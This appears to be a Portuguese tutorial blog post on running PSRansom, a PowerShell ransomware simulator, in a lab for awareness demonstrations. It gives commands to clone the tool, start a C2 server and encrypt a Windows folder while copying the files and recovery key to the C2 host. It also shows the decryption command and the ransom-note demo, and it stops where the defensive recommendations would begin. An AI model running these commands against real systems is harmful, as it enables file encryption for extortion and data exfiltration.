PSRansom é um script escrito em PowerShell que permite simular o funcionamento de um Ransomware. É um script que você pode utilizar por exemplo em uma apresentação de conscientização sobre os riscos e o impacto que um ransomware pode causar.
🔴 O uso indevido desta técnica é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.
Realize o clone do projeto PSRansom
Linuxgit clone https://github.com/JoelGMSec/PSRansom cd PSRansom ls -l
Inicie o C2 Server através do comando a seguir :
Linuxpwsh C2Server.ps1 + 80
No host Windows criei a pasta 100SECURITY com alguns arquivos como exemplo.
Realize o download do PSRansom no Windows e execute o comando a seguir:
.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x
No servidor C2 o atacante recebe a lista de arquivos que foram criptografados e a Chave de Recuperação.
LinuxChave de Recuperação : WNLmTxjnDpzZGaEF4AsUYgi5
Arquivos criptografados com a extensão .psr
Dentro da pasta C2Files o atacante recebe uma cópia de todos os arquivos antes da criptografia.
Linuxcd CS2Files ls -l
Observe que foi criado o arquivo readme.txt contendo a Chave de Recuperação dos arquivos.
WindowsRecovery Key : WNLmTxjnDpzZGaEF4AsUYgi5
Para recuperar os arquivos basta digitar o comando a seguir :
PoweShell.\PSRansom.ps1 -d C:\100SECURITY -K WNLmTxjnDpzZGaEF4AsUYgi5
Arquivos recuperados com sucesso!
Para exibir a mensagem basta utilizar o parâmetro -demo :
PoweShell.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x -demo
💀 Mensagem!
Se o usuário clicar em Pay Now! é exibido um pop-up na tela.
O impacto e o prejuízo financeiro que este tipo de ataque por causar nas empresa é muito grande, segue algumas recomendações :